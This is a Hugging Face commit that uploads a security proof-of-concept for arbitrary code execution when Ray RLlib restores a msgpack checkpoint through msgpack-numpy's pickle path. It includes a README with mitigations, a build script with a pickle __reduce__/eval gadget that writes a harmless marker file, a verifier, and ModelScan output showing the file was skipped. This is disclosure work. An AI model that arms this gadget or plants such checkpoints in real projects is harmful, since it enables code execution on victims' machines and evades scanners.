pragnyanramtha commited on
Commit
2a3c1ea
·
verified ·
1 Parent(s): acf0cc3

Upload folder using huggingface_hub

Browse files
README.md ADDED
@@ -0,0 +1,107 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Benign MessagePack / RLlib Checkpoint Security PoC
2
+
3
+ This repository stages a safe proof-of-concept for a MessagePack-based ML checkpoint loading issue. The artifact is a tiny `state.msgpack` file that follows the Ray RLlib checkpoint state-file shape and carries a NumPy object-dtype array encoded through `msgpack-numpy`.
4
+
5
+ When decoded through Ray RLlib's `restore_from_path()` MessagePack path, the current `msgpack-numpy` decoder reaches `pickle.loads()` for object-dtype array data. The embedded payload only writes a local marker file named `MSG_PACK_NUMPY_MARKER.txt`.
6
+
7
+ ## Files
8
+
9
+ - `state.msgpack` - benign PoC checkpoint state file.
10
+ - `verify_poc.py` - verifies plain MessagePack parsing, direct `msgpack-numpy` parsing, and Ray RLlib restore behavior.
11
+ - `build_poc.py` - reproduces the artifact generation.
12
+ - `artifact_manifest.json` - SHA256, size, and marker details.
13
+ - `results.json` - local verification output.
14
+ - `scanner_output_file.json` - ModelScan 0.8.8 output for `state.msgpack`.
15
+ - `scanner_output_dir.json` - ModelScan 0.8.8 output for this staged folder.
16
+ - `requirements.txt` - pinned reproduction dependencies used for this validation.
17
+
18
+ ## Tested Versions
19
+
20
+ - Python 3.12.12
21
+ - Ray 2.55.1
22
+ - msgpack 1.1.2
23
+ - msgpack-numpy 0.4.8
24
+ - NumPy 2.4.4
25
+ - ModelScan 0.8.8
26
+
27
+ ## Reproduction
28
+
29
+ ```bash
30
+ python -m venv .venv
31
+ .venv/Scripts/python -m pip install -r requirements.txt
32
+ .venv/Scripts/python build_poc.py
33
+ .venv/Scripts/python verify_poc.py
34
+ .venv/Scripts/modelscan -p state.msgpack -r json -o scanner_output_file.json --show-skipped
35
+ ```
36
+
37
+ On Linux/macOS, replace `.venv/Scripts/python` with `.venv/bin/python`.
38
+
39
+ Expected behavior:
40
+
41
+ - Plain `msgpack.load()` parses the file as data and does not create the marker.
42
+ - `msgpack_numpy.load()` creates `MSG_PACK_NUMPY_MARKER.txt`.
43
+ - Ray RLlib `Checkpointable.restore_from_path()` creates `MSG_PACK_NUMPY_MARKER.txt`.
44
+ - ModelScan 0.8.8 reports `total_scanned: 0` and skips `state.msgpack` as `SCAN_NOT_SUPPORTED`.
45
+
46
+ ## Evidence Summary
47
+
48
+ Artifact:
49
+
50
+ ```text
51
+ SHA256: 3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
52
+ Size: 506 bytes
53
+ ```
54
+
55
+ Runtime:
56
+
57
+ ```json
58
+ "ray_rllib_restore_check": {
59
+ "restored_keys": ["format", "object_array", "safe_weights"],
60
+ "object_array_type": "ndarray",
61
+ "object_array_repr": "array([34], dtype=object)",
62
+ "marker_created": true,
63
+ "marker_text": "msgpack_numpy_object_array_marker\n"
64
+ }
65
+ ```
66
+
67
+ Scanner:
68
+
69
+ ```json
70
+ "scanned": {"total_scanned": 0},
71
+ "skipped": {
72
+ "total_skipped": 1,
73
+ "skipped_files": [{
74
+ "category": "SCAN_NOT_SUPPORTED",
75
+ "description": "Model Scan did not scan file",
76
+ "source": "state.msgpack"
77
+ }]
78
+ }
79
+ ```
80
+
81
+ ## Why This Is ML-Format Relevant
82
+
83
+ Ray RLlib documents checkpoints as model/training artifacts that can be saved to local disk or cloud storage and restored through `restore_from_path()` / `from_checkpoint()`. The docs state that checkpoint directories contain a `pickle` or `msgpack` state file, and current RLlib source loads `state.msgpack` with a `msgpack` module patched by `msgpack-numpy`.
84
+
85
+ Primary references:
86
+
87
+ - Ray RLlib checkpoint docs: https://docs.ray.io/en/latest/rllib/checkpoints.html
88
+ - Ray RLlib source for `state.msgpack` restore and `try_import_msgpack`: https://docs.ray.io/en/latest/_modules/ray/rllib/utils/checkpoints.html
89
+ - msgpack-numpy 0.4.8 decoder source: https://github.com/lebedov/msgpack-numpy/blob/0.4.8/msgpack_numpy.py
90
+ - ModelScan 0.8.8 supported scanner extensions: https://github.com/protectai/modelscan/blob/v0.8.8/modelscan/settings.py
91
+
92
+ ## Security Impact
93
+
94
+ An attacker-controlled RLlib `.msgpack` checkpoint state file can trigger arbitrary Python execution when a victim restores the checkpoint through RLlib's MessagePack path. This PoC uses a harmless local marker write, but the primitive is Python pickle execution hidden inside a MessagePack/NumPy serialization layer.
95
+
96
+ Limitations:
97
+
98
+ - This is not a native parser memory-corruption issue.
99
+ - It requires a victim workflow that restores an untrusted Ray RLlib MessagePack checkpoint or otherwise decodes the artifact through `msgpack-numpy`.
100
+ - The scanner evidence is a ModelScan unsupported-format gap for a dangerous `.msgpack` artifact, not a claim that every Hugging Face scanner accepts the file as clean.
101
+
102
+ ## Mitigations
103
+
104
+ - Do not restore untrusted RLlib MessagePack checkpoints.
105
+ - Reject or sanitize object-dtype arrays during MessagePack checkpoint restore.
106
+ - Avoid `msgpack_numpy.patch()` for untrusted checkpoint data, or make the object-dtype pickle path opt-in only.
107
+ - Add scanner support for `.msgpack` model artifacts that recursively detects nested pickle payloads in `msgpack-numpy` object-array records.
artifact_manifest.json ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "artifact": "state.msgpack",
3
+ "sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
4
+ "size_bytes": 506,
5
+ "marker_file": "MSG_PACK_NUMPY_MARKER.txt",
6
+ "marker_text": "msgpack_numpy_object_array_marker",
7
+ "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy."
8
+ }
build_poc.py ADDED
@@ -0,0 +1,64 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python
2
+ """Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""
3
+
4
+ from __future__ import annotations
5
+
6
+ import hashlib
7
+ import json
8
+ from pathlib import Path
9
+
10
+ import msgpack_numpy
11
+ import numpy as np
12
+
13
+
14
+ ARTIFACT_NAME = "state.msgpack"
15
+ MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
16
+ MARKER_TEXT = "msgpack_numpy_object_array_marker\n"
17
+
18
+
19
+ class Marker:
20
+ def __reduce__(self):
21
+ # Benign local marker-file proof. No network, persistence, or destructive action.
22
+ code = (
23
+ "__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
24
+ % (MARKER_NAME, MARKER_TEXT)
25
+ )
26
+ return (eval, (code,))
27
+
28
+
29
+ def sha256(path: Path) -> str:
30
+ digest = hashlib.sha256()
31
+ with path.open("rb") as handle:
32
+ for chunk in iter(lambda: handle.read(1024 * 1024), b""):
33
+ digest.update(chunk)
34
+ return digest.hexdigest()
35
+
36
+
37
+ def main() -> None:
38
+ out_dir = Path(__file__).resolve().parent
39
+ artifact = out_dir / ARTIFACT_NAME
40
+
41
+ state = {
42
+ "format": "ray_rllib_state_msgpack",
43
+ "safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
44
+ "object_array": np.array([Marker()], dtype=object),
45
+ }
46
+ artifact.write_bytes(msgpack_numpy.packb(state, use_bin_type=True))
47
+
48
+ manifest = {
49
+ "artifact": ARTIFACT_NAME,
50
+ "sha256": sha256(artifact),
51
+ "size_bytes": artifact.stat().st_size,
52
+ "marker_file": MARKER_NAME,
53
+ "marker_text": MARKER_TEXT.strip(),
54
+ "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
55
+ }
56
+ (out_dir / "artifact_manifest.json").write_text(
57
+ json.dumps(manifest, indent=2) + "\n",
58
+ encoding="utf-8",
59
+ )
60
+ print(json.dumps(manifest, indent=2))
61
+
62
+
63
+ if __name__ == "__main__":
64
+ main()
requirements.txt ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ ray[rllib]==2.55.1
2
+ msgpack==1.1.2
3
+ msgpack-numpy==0.4.8
4
+ numpy==2.4.4
5
+ modelscan==0.8.8
results.json ADDED
@@ -0,0 +1,44 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "artifact": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc\\state.msgpack",
3
+ "artifact_sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
4
+ "artifact_size_bytes": 506,
5
+ "versions": {
6
+ "python": "3.12.12 (main, Oct 28 2025, 14:15:42) [MSC v.1944 64 bit (AMD64)]",
7
+ "ray": "2.55.1",
8
+ "msgpack": "1.1.2",
9
+ "msgpack-numpy": "0.4.8",
10
+ "numpy": "2.4.4",
11
+ "modelscan": "0.8.8"
12
+ },
13
+ "plain_msgpack_check": {
14
+ "plain_msgpack_type": "dict",
15
+ "plain_msgpack_keys": [
16
+ "format",
17
+ "object_array",
18
+ "safe_weights"
19
+ ],
20
+ "marker_created": false
21
+ },
22
+ "direct_msgpack_numpy_check": {
23
+ "msgpack_numpy_type": "dict",
24
+ "msgpack_numpy_keys": [
25
+ "format",
26
+ "object_array",
27
+ "safe_weights"
28
+ ],
29
+ "marker_created": true,
30
+ "marker_text": "msgpack_numpy_object_array_marker\n"
31
+ },
32
+ "ray_rllib_restore_check": {
33
+ "restored_keys": [
34
+ "format",
35
+ "object_array",
36
+ "safe_weights"
37
+ ],
38
+ "object_array_type": "ndarray",
39
+ "object_array_repr": "array([34], dtype=object)",
40
+ "marker_created": true,
41
+ "marker_text": "msgpack_numpy_object_array_marker\n"
42
+ },
43
+ "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue."
44
+ }
scanner_output_dir.json ADDED
@@ -0,0 +1 @@
 
 
1
+ {"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": ".", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.546341", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 7, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "artifact_manifest.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "build_poc.py"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "results.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_dir.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_file.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "verify_poc.py"}]}}, "issues": [], "errors": []}
scanner_output_file.json ADDED
@@ -0,0 +1 @@
 
 
1
+ {"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": "state.msgpack", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.524512", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 1, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}]}}, "issues": [], "errors": []}
state.msgpack ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
3
+ size 506
verify_poc.py ADDED
@@ -0,0 +1,141 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python
2
+ """Verify the benign MessagePack/model checkpoint deserialization PoC."""
3
+
4
+ from __future__ import annotations
5
+
6
+ import argparse
7
+ import hashlib
8
+ import importlib.metadata as metadata
9
+ import json
10
+ import sys
11
+ from pathlib import Path
12
+ from typing import Any, Dict, Optional, Tuple
13
+
14
+ import msgpack
15
+ import msgpack_numpy
16
+ import numpy as np
17
+ import ray
18
+ from ray.rllib.utils.checkpoints import Checkpointable
19
+
20
+
21
+ ARTIFACT_NAME = "state.msgpack"
22
+ MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
23
+
24
+
25
+ class DemoCheckpointable(Checkpointable):
26
+ def __init__(self) -> None:
27
+ self.restored_state: Optional[Dict[str, Any]] = None
28
+
29
+ def get_state(self, components=None, *, not_components=None, **kwargs):
30
+ return {}
31
+
32
+ def set_state(self, state):
33
+ self.restored_state = state
34
+
35
+ def get_ctor_args_and_kwargs(self) -> Tuple[Tuple, Dict[str, Any]]:
36
+ return (), {}
37
+
38
+
39
+ def sha256(path: Path) -> str:
40
+ digest = hashlib.sha256()
41
+ with path.open("rb") as handle:
42
+ for chunk in iter(lambda: handle.read(1024 * 1024), b""):
43
+ digest.update(chunk)
44
+ return digest.hexdigest()
45
+
46
+
47
+ def package_version(name: str) -> str:
48
+ try:
49
+ return metadata.version(name)
50
+ except metadata.PackageNotFoundError:
51
+ return "not installed"
52
+
53
+
54
+ def plain_msgpack_check(artifact: Path, marker: Path) -> Dict[str, Any]:
55
+ marker.unlink(missing_ok=True)
56
+ with artifact.open("rb") as handle:
57
+ data = msgpack.load(handle, raw=False, strict_map_key=False)
58
+ return {
59
+ "plain_msgpack_type": type(data).__name__,
60
+ "plain_msgpack_keys": sorted(str(k) for k in data.keys()),
61
+ "marker_created": marker.exists(),
62
+ }
63
+
64
+
65
+ def rllib_restore_check(checkpoint_dir: Path, marker: Path) -> Dict[str, Any]:
66
+ marker.unlink(missing_ok=True)
67
+ demo = DemoCheckpointable()
68
+ demo.restore_from_path(checkpoint_dir)
69
+ restored = demo.restored_state or {}
70
+ marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
71
+ object_value = restored.get("object_array")
72
+ return {
73
+ "restored_keys": sorted(restored.keys()),
74
+ "object_array_type": type(object_value).__name__,
75
+ "object_array_repr": repr(object_value),
76
+ "marker_created": marker.exists(),
77
+ "marker_text": marker_text,
78
+ }
79
+
80
+
81
+ def direct_msgpack_numpy_check(artifact: Path, marker: Path) -> Dict[str, Any]:
82
+ marker.unlink(missing_ok=True)
83
+ with artifact.open("rb") as handle:
84
+ data = msgpack_numpy.load(handle, raw=False, strict_map_key=False)
85
+ marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
86
+ return {
87
+ "msgpack_numpy_type": type(data).__name__,
88
+ "msgpack_numpy_keys": sorted(data.keys()),
89
+ "marker_created": marker.exists(),
90
+ "marker_text": marker_text,
91
+ }
92
+
93
+
94
+ def main() -> None:
95
+ parser = argparse.ArgumentParser()
96
+ parser.add_argument(
97
+ "--artifact",
98
+ type=Path,
99
+ default=Path(__file__).resolve().parent / ARTIFACT_NAME,
100
+ )
101
+ parser.add_argument(
102
+ "--results",
103
+ type=Path,
104
+ default=Path(__file__).resolve().parent / "results.json",
105
+ )
106
+ args = parser.parse_args()
107
+
108
+ artifact = args.artifact.resolve()
109
+ checkpoint_dir = artifact.parent
110
+ marker = Path.cwd() / MARKER_NAME
111
+
112
+ if not artifact.exists():
113
+ raise FileNotFoundError(artifact)
114
+
115
+ results = {
116
+ "artifact": str(artifact),
117
+ "artifact_sha256": sha256(artifact),
118
+ "artifact_size_bytes": artifact.stat().st_size,
119
+ "versions": {
120
+ "python": sys.version,
121
+ "ray": ray.__version__,
122
+ "msgpack": package_version("msgpack"),
123
+ "msgpack-numpy": package_version("msgpack-numpy"),
124
+ "numpy": np.__version__,
125
+ "modelscan": package_version("modelscan"),
126
+ },
127
+ "plain_msgpack_check": plain_msgpack_check(artifact, marker),
128
+ "direct_msgpack_numpy_check": direct_msgpack_numpy_check(artifact, marker),
129
+ "ray_rllib_restore_check": rllib_restore_check(checkpoint_dir, marker),
130
+ "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue.",
131
+ }
132
+
133
+ args.results.write_text(json.dumps(results, indent=2, default=str) + "\n", encoding="utf-8")
134
+ print(json.dumps(results, indent=2, default=str))
135
+
136
+ if not results["ray_rllib_restore_check"]["marker_created"]:
137
+ raise SystemExit("marker was not created through Ray RLlib restore path")
138
+
139
+
140
+ if __name__ == "__main__":
141
+ main()